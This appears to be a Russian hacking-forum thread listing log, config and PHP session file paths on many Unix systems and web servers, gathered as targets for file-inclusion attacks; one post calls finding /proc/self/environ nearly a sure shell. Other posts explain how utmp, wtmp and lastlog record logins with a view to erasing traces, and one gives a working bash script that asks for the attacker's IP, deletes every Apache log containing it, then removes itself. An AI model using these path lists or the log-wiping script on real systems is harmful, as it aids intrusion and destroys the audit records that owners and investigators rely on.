Сори, хотел исправить пост, а нажал делит) Выкладываю еще раз. IRIX: Code: /var/adm/SYSLOG /var/adm/sulog /var/adm/utmp /var/adm/utmpx /var/adm/wtmp /var/adm/wtmpx /var/adm/lastlog/username /usr/spool/lp/log /var/adm/lp/lpd-errs /usr/lib/cron/log /var/adm/loginlog /var/adm/pacct /var/adm/dtmp /var/adm/acct/sum/loginlog /var/adm/X0msgs /var/adm/crash/vmcore /var/adm/crash/unix AIX: Code: /var/adm/pacct /var/adm/wtmp /var/adm/dtmp /var/adm/qacct /var/adm/sulog /var/adm/ras/errlog /var/adm/ras/bootlog /var/adm/cron/log /etc/utmp /etc/security/lastlog /etc/security/failedlogin /usr/spool/mqueue/syslog SunOS: Code: /var/adm/messages /var/adm/aculogs /var/adm/aculog /var/adm/sulog /var/adm/vold.log /var/adm/wtmp /var/adm/wtmpx /var/adm/utmp /var/adm/utmpx /var/adm/log/asppp.log /var/log/syslog /var/log/POPlog /var/log/authlog /var/adm/pacct /var/lp/logs/lpsched /var/lp/logs/lpNet /var/lp/logs/requests /var/cron/log /var/saf/_log /var/saf/port/log Linux: Code: /var/log/lastlog /var/log/telnetd /var/run/utmp /var/log/secure /root/.ksh_history /root/.bash_history /root/.bash_logut /var/log/wtmp /etc/wtmp /var/run/utmp /etc/utmp /var/log /var/adm /var/apache/log /var/apache/logs /usr/local/apache/log /usr/local/apache/logs /var/log/acct /var/log/xferlog /var/log/messages /var/log/proftpd/xferlog.legacy /var/log/proftpd.access_log /var/log/proftpd.xferlog /var/log/httpd/error_log /var/log/httpd/access_log /etc/httpd/logs/access_log /etc/httpd/logs/error_log /var/log/httpsd/ssl.access_log /var/log/httpsd/ssl_log /var/log/httpsd/ssl.access_log /etc/mail/access /var/log/qmail /var/log/smtpd /var/log/samba /var/log/samba-log.%m /var/lock/samba /root/.Xauthority /var/log/poplog /var/log/news.all /var/log/spooler /var/log/news /var/log/news/news /var/log/news/news.all /var/log/news/news.crit /var/log/news/news.err /var/log/news/news.notice /var/log/news/suck.err /var/log/news/suck.notice /var/spool/tmp /var/spool/errors /var/spool/logs /var/spool/locks /usr/local/www/logs/thttpd_log /var/log/thttpd_log /var/log/ncftpd/misclog.txt /var/log/ncftpd.errs /var/log/auth Red Hat, Mac OS X Code: /var/log/httpd/access_log /var/log/httpd/error_log Solaris Code: /var/apache/logs/access_log /var/apache/logs/error_log SuSE Linux Enterprise Server Code: /var/log/httpd/access_log /var/log/httpd/error_log Lampp Code: /opt/lampp/logs/error_log /opt/lampp/logs/access_log Debian Code: /var/log/apache/access.log /var/log/apache/error.log /var/log/apache-ssl/error.log /var/log/apache-ssl/access.log FreeBSD Code: /usr/local/etc/httpd/logs/access_log /usr/local/etc/httpd/logs/error_log OpenBSD Code: /var/www/log/access_log /var/www/log/error_log
Kак пишутся логины в систему Есть основные места, в которых сохраняется системная информация о логине: /usr/etc/wtmp /usr/etc/lastlog /etc/utmp utmp пишет инфу о том, кто в настоящее время использует систему. Файл - последовательность входов со следующей структурой, которая конфигурится в /usr/include/utmp.h Code: struct utmp { char ut_line[8]; /* tty name */ char ut_name[8]; /* user id */ char ut_host[16]; /* host name, if remote */ long ut_time; /* time on */ } Эта структура пишет название терминалки юзера, юзер ID-ентификатор логиняшегося,имя хоста откель логинился, если не локально и время входа в систему. на многих платформах структура разная, но все равно легко достаточно читается. wtmp пишет все входа и выходы из системы. Пустое имя пользователя указывает выход из системы на связанном терминале. Кроме того, '~' указывает, что система была перезагружена в указанное время; вход с именами включающими'|' говорит, что система изменила время как раз перед логоном и с именами и '{' после того как был совершен логон (то есть , команда даты изменила время системы. Wtmp обслуживается login(1) и init (8). Они свои события по идее не пишут никуда, так что если их отрубить, то и логи в wtmp писаться не будут. Wtmp используется вместе с командой/usr/ucb/last. Это понятно? Запросто проверить если служба не работает. /usr/adm/lastlog используется login(1) для того, чтобы сохранить предыдущие даты входа в систему, время, в которое они были, и с какого хоста подключались. Структура для lastlog такая: Code: struct lastlog { time_t ll_time; char ll_line[8]; char ll_host[16]; };
Code: [B]/[/B]usr/local/etc/apache2/vhosts.conf [B]/[/B]usr/local/apache/conf/vhosts.conf [B]/[/B]usr/local/apache2/conf/vhosts.conf [B]/[/B]usr/local/apache/conf/vhosts-custom.conf [B]/[/B]usr/local/apache2/conf/vhosts-custom.conf прим. BlackSun: пути в данном случае должны начинаться со слешей, без них это относительные пути. там всегда полный и правильный Document Root + часто полный адрес ERROR логов Ну и моё любимое чото тут не наблюдал вроде: Code: /proc/self/environ если нашли такое - в 99% случаев сразу шелл прим. BlackSun: ты хоть ветку почитай полностью .. https://forum.antichat.ru/showpost.php?p=1088072&postcount=11
sess_ location /tmp/ /php_sess/ /tmp/phpsess/ /tmp/php/ /tmp/php-sess/ /home/%username%/tmp/ /var/phptemp/ /var/phptmp/ /var/phpsess/ /var/php-sess/ /var/lib/php/ /var/lib/php/session/ /var/lib/php3 /var/lib/php3/session/ /var/lib/php4/ /var/lib/php4/session/ /var/lib/php5/ /var/lib/php5/session/ /var/lib/php6/ /var/lib/php6/session/ /www/phpsession/ C:\Temp C:\WINDOWS\Temp C:\PHP\sessiondata .htaccess php_value "session.save_path" "/path" phpinfo() session.save_handler files session.save_path /path Самый лучший вариант это поиск пшпинфо на сайте, т.к в нём вы увидим мастер валью, т.е то что прописано в php.ini и локал валью, то что прописано (если прописано) в .htaccess'e Второй вариант поиск пшп.ини и .htaccess'ов Ну и конечно можно просто искать саму папку с сессиями
Только что так заюзал: Code: /etc/apache/default-server.conf /etc/apache2/default-server.conf может содержать DocumentRoot
Cкрипт, который находит и удаляет лог файлы Code: #!/usr/local/bin/bash ### coded by t4z3v4r3d ### recurse function : i m not sure who has write that .So thanks unknown man ### made for FreeBSD First .... if [ "`id -u`" != "0" ];then echo "$0 cant run as $USER Please Give me the root perms!!!!! " exit 1 fi patern=$2 fl=/tmp/f.txt fd=/tmp/find.txt length=/tmp/l-f.txt log_f=/tmp/log_f.txt log_final=/tmp/final_log.txt null=/dev/null log_path=/tmp/log_Found_.txt tm="`date | cut -d ":" -f 1`" os=$OSTYPE # you can add all paths for all os type !M$ windows IS NOT OS ....Exactly! case $os in Linux*) path=/etc/ ;; linux*) path=/etc/ ;; freebsd*) path=/usr/local/ ;; *) path=/ ;; esac rm $fl touch $fl rm $fd touch $fd rm $log_f touch $log_f rm $log_final touch $log_final rm $log_path touch $log_path clear echo "Enter attacker IP" read -e ip if [ "`find $path -name apache >> $fl`" ];then echo -e "\033[3;2f Main path Found ....\033[0;0m" else if [ "`find $path -name apache2 >> $fl`" ];then echo "Founded Apache2 Config files" fi fi recurse () { for file in $(/bin/ls $1) do fqfn=$1/$file [[ -d $fqfn ]] && recurse $fqfn [[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; } [[ -f $fqfn ]] && recurse $fqfn [[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; } ######################################################### if [ -f $1 ];then let "f=f+1" if [ "`ls $1 | grep -F .conf`" ];then let "t=t+1" cat $1 | grep -F .log | grep -v "#" | cut -d " " -f 2 >> $log_path nom[$t]="`cat $1 | grep -F .log | grep -v "#" | wc -l`" echo -e "reading $1\n `cat $1 | grep -F .log | grep -v "#"`" >> /tmp/r.txt let "nt=nt+${nom[$t]}" let "j=$nt+$t" fi fi ################################################################################ ### MOnitoring all acts ################################################################################ echo -e "\033[3;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m" echo -e "\033[1;39m|\033[1;31m Scanned Files :\033[4;25f \033[1;37m$f\033[1;39m\033[4;40f|\033[0;0m" echo -e "\033[1;39m|\033[1;31m Path(s) found :\033[5;25f \033[1;37m$l\033[1;39m\033[5;40f|\033[0;0m" echo -e "\033[1;39m|\033[1;31m pattern found :\033[6;25f \033[1;37m$t\033[1;39m\033[6;40f|\033[0;0m" echo -e "\033[1;39m|\033[1;31m pattern total :\033[7;25f \033[1;37m$j\033[1;39m\033[7;40f|\033[0;0m" echo -e "\033[1;39m|\033[1;30m\033[8;2f Scanning `dirname ${1}`::: \033[1;39m\033[8;40f|\033[0;0m" echo -e "\033[9;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m" ############################################################################## done ; } reader(){ cat $fl | while read line ;do if [ "`ls $line | grep .conf`" != "" ];then recurse $line fi let "l=l+1" done } reader log_path_reader(){ cat $log_path | while read line ;do if [ -f $line ];then if [ "`cat $line | grep "$ip"`" != "" ];then echo -en "\033[1;30mFounded[\033[1;31m"`cat $line | grep -c "$ip"`" \033[1;30m] $ip in " echo -n "Removing $line" rm $line if [ ! -f $line ];then echo -e "\033[1;39m ... Done !\033[0;0m" else echo -e "\033[1;31m ...Failed!\033[1;0m" fi fi else echo -e "\033[1;30mFile [\033[1;31m"$line " \033[1;39mFile Dose not exist......\033[1;30m]" fi let "l2=l2+1" done } echo -e "\033[8;3f\033[1;31mpath= $path OS= $os\033[0;0m" echo -e "\033[11;1f\033[1;30mScanning DONE!! NOW : Removing Log Files \033[0;0m" log_path_reader echo -en "\033[1;30mRemoving $0 " rm $fl $log_path $0 if [ ! -f $0 ];then echo -e "\033[1;39m ... Done !\033[0;0m" else echo -e "\033[1;31m ...Failed!\033[1;0m" fi echo -e "\033[1;37m Mail: [email protected]\033[0;0m"
LiteSpeed Web Server Zeus Web Server (ZWS) default conf: /usr/local/zeus/web/global.cfg default log: /usr/local/zeus/web/log/errors LiteSpeed Web Server default conf: /opt/lsws/conf/httpd_conf.xml /usr/local/lsws/conf/httpd_conf.xml default log: /opt/lsws/logs/error.log /opt/lsws/logs/access.log /usr/local/lsws/logs/error.log /usr/local/logs/access.log
Зачастую демоны запускаются через init.d. Это существенно облегчает нам поиск логов и конфигов init.d - mysql /etc/init.d/mysql init.d - apache /etc/init.d/httpd /etc/init.d/apache /etc/init.d/apache2 Как примерно выглядит этот файл Code: #!/bin/sh # # Copyright (c) 1996, 1997, 1998 S.u.S.E. GmbH # Copyright (c) 1998, 1999, 2000, 2001 SuSE GmbH # Copyright (c) 2002, 2003 SuSE Linux AG # # Authors: Rolf Haberrecker <[email protected]>, 2001 # Peter Poeml <[email protected]>, 2002, 2003, 2004, 2005 # # # /etc/init.d/apache2 # ### BEGIN INIT INFO # Provides: apache2 httpd2 # Required-Start: $local_fs $remote_fs $network # X-UnitedLinux-Should-Start: $named $time postgresql sendmail mysql ypclient dhcp radiusd # Required-Stop: $local_fs $remote_fs $network # X-UnitedLinux-Should-Stop: # Default-Start: 3 5 # Default-Stop: 0 1 2 6 # Short-Description: Apache 2.2 httpd # Description: Start the httpd daemon Apache ### END INIT INFO pname=apache2 : ${sysconfdir:=/etc/$pname} : ${apache_link:=/usr/sbin/httpd2} : ${sysconfig_apache:=/etc/sysconfig/$pname} : ${pidfile:=/var/run/httpd2.pid} : ${logdir:=/var/log/$pname} # # load the configuration # test -s /etc/rc.status && . /etc/rc.status && rc_reset . /usr/share/$pname/load_configuration export ${!APACHE_*} httpd_conf=${APACHE_HTTPD_CONF:-$sysconfdir/httpd.conf} apache_bin=$(/usr/share/$pname/find_mpm 2>/dev/null) test -L $apache_link && apache_bin=$(readlink $apache_link) if [ -z "$APACHE_MPM" ]; then APACHE_MPM=${apache_bin##*-} fi if ! [ -x $apache_bin ]; then echo >&2 ${warn}$apache_bin-$APACHE_MPM is not a valid httpd2 binary. echo >&2 Check your APACHE_MPM setting in /etc/sysconfig/$pname. $norm rc_failed 5 rc_status -v1 rc_exit fi get_server_flags() { unset server_flags case "$action" in startssl) server_flags="-DSSL";; esac for i in $APACHE_SERVER_FLAGS; do case $i in -D) ;; -D*) server_flags="$server_flags $i";; *) server_flags="$server_flags -D$i";; esac done } action="$1" case "$action" in stop|try-restart|*status*|probe) ;; *) shift; get_server_flags ${get_module_list_done:=false} || /usr/share/$pname/get_module_list && export get_module_list_done=true ${get_includes:=false} || /usr/share/$pname/get_includes && export get_includes_done=true ;; esac # # main part # case "$action" in start*) if [ -e $pidfile ]; then $0 status &>/dev/null ret=$? if [ $ret = 1 ]; then echo "Warning: found stale pidfile (unclean shutdown?)" elif [ $ret = 0 ]; then echo "Apache is already running ($pidfile)" rc_failed $ret rc_status -v1 rc_exit fi fi echo -n "Starting httpd2 (${APACHE_MPM:-${apache_bin#*-}}) " cmdline=$(echo $apache_bin -f $httpd_conf $server_flags "$@") if eval $cmdline -t > $logdir/rc$pname.out 2>&1 ; then export -n ${!APACHE_*} eval startproc -f -t ${APACHE_START_TIMEOUT:-2} $cmdline ret=$? if test -t 1 && stty -a 2>/dev/null | grep -q -- -echo\ ; then # this means that apache was still waiting for a passphrase to be entered stty echo 2>/dev/null echo;echo echo >&2 An SSL passphrase has not been entered within ${APACHE_START_TIMEOUT:-<not set>} seconds. echo >&2 To increase this timeout, adjust APACHE_START_TIMEOUT in $sysconfig_apache . # this surely means that apache won't start, despite it looked good to startproc killall $apache_bin echo >&2 "Trying to start the server without SSL (-D NOSSL)." $0 start "$@" -D NOSSL # rc_failed 1 # rc_status -v1 # rc_exit else rc_failed $ret rc_status -v fi else if [ "$link" = "$base" ] ; then cat $logdir/rc$pname.out echo >&2 echo >&2 The command line was: echo >&2 $cmdline echo >&2 else echo -e -n "\nsee $logdir/rc$pname.out for details\n"; fi rc_failed 1 rc_status -v1 fi ;; stop) echo -n "Shutting down httpd2 " if [ ! -f $pidfile -a -f $pidfile.rpmsave ]; then mv $pidfile.rpmsave $pidfile; fi if ! [ -f $pidfile ]; then echo -n "(not running)" else pid=$(<$pidfile) kill -TERM $pid 2>/dev/null case $? in 1) echo -n "(not running)";; 0) # wait until the processes are gone (the parent is the last one) echo -n "(waiting for all children to terminate) " for ((wait=0; wait<120; wait++)); do if test -f $pidfile; then usleep 500000 continue fi if ! test -f /proc/$pid/exe; then break fi if test "$(readlink /proc/$pid/exe 2>/dev/null)" = $apache_bin; then usleep 500000 else break fi done ;; esac fi rc_status -v ;; try-restart) ## Do a restart only if the service was active before. ## Note: try-restart is now part of LSB (as of 1.9). ## RH has a similar command named condrestart. $0 status if test $? = 0; then $0 restart else rc_reset # Not running is not a failure. fi # Remember status and be quiet rc_status ;; restart) $0 configtest "$@" || { rc_failed $?; rc_exit; } if $0 status &>/dev/null; then $0 stop fi $0 start "$@" # Remember status and be quiet rc_status ;; restart-hup) $0 configtest "$@" || { rc_failed $?; rc_exit; } if $0 status &>/dev/null; then echo -n "Restarting httpd2 (SIGHUP)" kill -HUP $(<$pidfile) || return=$rc_failed else $0 start "$@" fi # Remember status and be quiet rc_status -v ;; reload|force-reload|graceful) echo -n "Reload httpd2 (graceful restart)" cmdline=$(echo $apache_bin -f $httpd_conf $server_flags "$@") if eval $cmdline -t &> $logdir/rc$pname.out; then killproc -USR1 $apache_bin || return=$rc_failed rc_status -v else if [ "$link" = "$base" ] ; then echo -e -n "\n\n" cat $logdir/rc$pname.out echo >&2 echo >&2 The command line was: echo >&2 $cmdline echo >&2 else echo -e -n "\nsee $logdir/rc$pname.out for details\n"; fi rc_failed 6 rc_status -v1 fi ;; status) if [ ! -f $pidfile -a -f $pidfile.rpmsave ]; then mv $pidfile.rpmsave $pidfile; fi echo -n "Checking for httpd2: " # we don't use checkproc here since it is confused when we exchange the binaries if ! [ -f $pidfile ]; then # not running rc_failed 3 elif [ -s $pidfile -a -d /proc/$(<$pidfile) ]; then # running : else # stale pid file rc_failed 1 #rm -f $pidfile fi rc_status -v ;; probe) ## Optional: Probe for the necessity of a reload, ## give out the argument which is required for a reload. for i in $httpd_conf \ $APACHE_CONF_INCLUDE_FILES \ $APACHE_CONF_INCLUDE_DIRS do if [ $i -nt $pidfile ]; then echo reload break fi done ;; conf*|test|syntax|check) cmdline=$(echo $apache_bin -f $httpd_conf $server_flags "$@") eval $cmdline -t rc_failed $? rc_exit ;; extr*) cmdline=$(echo $apache_bin -f $httpd_conf $server_flags "$@") out=$(su - nobody -c "$cmdline" 2>&1) case $out in *make_sock:\ could\ not\ bind\ to\ address*) echo Syntax: OK; rc_failed=0;; *) echo Syntax: NOT OK:; echo $out; rc_failed=1;; esac rc_exit ;; server-status) apache2ctl status ;; full-server-status|fullstatus) apache2ctl fullstatus ;; *) cat >&2 <<-EOF Usage: $0 <command> <server flags> where <command> is one of: start - start httpd startssl - start httpd with -DSSL stop - stop httpd (sendign SIGTERM to parent) try-restart - stop httpd and if this succeeds (i.e. if it was running before), start it again. status - check whether httpd is running restart - stop httpd if running; start httpd reload|graceful - do a graceful restart by sending a SIGUSR1 or start if not running configtest - do a configuration syntax test extreme-configtest - try to run httpd as nobody (detects more errors by actually loading the configuration, but cannot read SSL certificates) probe - probe for the necessity of a reload, give out the argument which is required for a reload. (by comparing conf files with pidfile timestamp) full-server-status - dump a full status screen; requires lynx or w3m and mod_status enabled server-status - dump a short status screen; requires lynx or w3m and mod_status enabled help - this screen optional server flags are passed through to httpd. EOF exit 1 esac # Inform the caller not only verbosely and set an exit status. rc_exit Смотрим pname=apache2 : ${sysconfdir:=/etc/$pname} ... httpd_conf=${APACHE_HTTPD_CONF:-$sysconfdir/httpd.conf} В данном случае конфиг находится в /etc/apache2/httpd.conf
Вот такой вот изврат сегодня во FreeBSD встретил: Code: /usr/local/etc/apache/httpd.conf /usr/local/etc/apache/vhosts.conf
Ubuntu (стали часто встречаться): Code: /etc/apache2/sites-available/default /etc/apache2/sites-available/default-ssl /etc/apache2/apache2.conf /etc/apache2/httpd.conf /etc/apache2/ports.conf /etc/apache2/sites-enabled/000-default /etc/apache2/sites-enabled/default
NetBSD: Code: /usr/pkg/etc/httpd/httpd.conf /usr/pkg/etc/httpd/httpd-default.conf /usr/pkg/etc/httpd/httpd-vhosts.conf
